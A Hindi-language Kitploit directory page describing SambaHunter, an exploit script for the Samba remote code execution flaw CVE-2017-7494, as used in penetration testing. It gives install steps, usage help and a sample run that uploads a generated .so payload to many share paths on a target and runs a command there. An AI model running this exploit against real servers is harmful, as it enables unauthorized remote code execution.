Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SambaHunter — यह Samba (CVE-2017-7494 ) के लिए RCE का शोषण करने का एक सरल स्क्रिप्ट है। | Kitploit
उपकरण/GitHubGitHub/brianwrf/sambahunter
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubbrianwrf/sambahunter

SambaHunter

यह Samba (CVE-2017-7494 ) के लिए RCE का शोषण करने का एक सरल स्क्रिप्ट है।

रिपॉजिटरी देखें
57244 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SambaHunter

यह Samba (CVE-2017-7494) के लिए RCE का शोषण करने वाला एक सरल स्क्रिप्ट है।

अब Python3 के साथ काम करता है। कई आवश्यक Python2 लाइब्रेरी पदावनत हो चुकी हैं (जैसे commands)

यह दिखाने के लिए लॉगिंग जोड़ी गई है कि कौन से शेयर लिखने योग्य हैं। यदि 'Exploit Finished' प्रकट होता है लेकिन कोई शेयर लिखने योग्य नहीं है, तो शोषण काम नहीं किया।

आवश्यकताएँ

  • sudo apt-get install smbclient
  • pip install pysmbclient

उपयोग

root@kitploit:~
# python3 sambahunter.py -h


  ____                  _           _   _             _            
 / ___|  __ _ _ __ ___ | |__   __ _| | | |_   _ _ __ | |_ ___ _ __ 
 \___ \ / _` | '_ ` _ \| '_ \ / _` | |_| | | | | '_ \| __/ _ \ '__|
  ___) | (_| | | | | | | |_) | (_| |  _  | |_| | | | | ||  __/ |   
 |____/ \__,_|_| |_| |_|_.__/ \__,_|_| |_|\__,_|_| |_|\__\___|_|   
                                                                   
    # Exploit Author: avfisher (https://github.com/brianwrf)
    # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution
    # CVE-2017-7494
    # Help: python sambahunter.py -h

usage: sambahunter.py [-h] [-s SERVER] [-c COMMAND]

optional arguments:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        Server to target
  -c COMMAND, --command COMMAND
                        Command to execute on target server

उदाहरण

root@kitploit:~
# python3 sambahunter.py -s 192.168.1.106 -c 'uname -a > /tmp/u.txt'


 ____                  _           _   _             _            
/ ___|  __ _ _ __ ___ | |__   __ _| | | |_   _ _ __ | |_ ___ _ __ 
\___ \ / _` | '_ ` _ \| '_ \ / _` | |_| | | | | '_ \| __/ _ \ '__|
 ___) | (_| | | | | | | |_) | (_| |  _  | |_| | | | | ||  __/ |   
|____/ \__,_|_| |_| |_|_.__/ \__,_|_| |_|\__,_|_| |_|\__\___|_|   
                                                                  
   # Exploit Author: avfisher (https://github.com/brianwrf)
   # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution
   # CVE-2017-7494
   # Help: python sambahunter.py -h

[*] Samba (CVE-2017-7494) के लिए RCE का शोषण...
[*] सर्वर: 192.168.1.106
[*] Samba संस्करण: Samba 4.3.8-Ubuntu
[*] पेलोड उत्पन्न सफल: /root/samba_14506.so
[+] बलपूर्वक शोषण: /volume1/samba_14506.so
[+] बलपूर्वक शोषण: /volume2/samba_14506.so
[+] बलपूर्वक शोषण: /volume3/samba_14506.so
[+] बलपूर्वक शोषण: /shared/samba_14506.so
[+] बलपूर्वक शोषण: /mnt/samba_14506.so
[+] बलपूर्वक शोषण: /mnt/usb/samba_14506.so
[+] बलपूर्वक शोषण: /media/samba_14506.so
[+] बलपूर्वक शोषण: /mnt/media/samba_14506.so
[+] बलपूर्वक शोषण: /var/samba/samba_14506.so
[+] बलपूर्वक शोषण: /tmp/samba_14506.so
[+] बलपूर्वक शोषण: /home/samba_14506.so
[+] बलपूर्वक शोषण: /home/shared/samba_14506.so
[*] शोषण समाप्त!

टूल डाउनलोड करें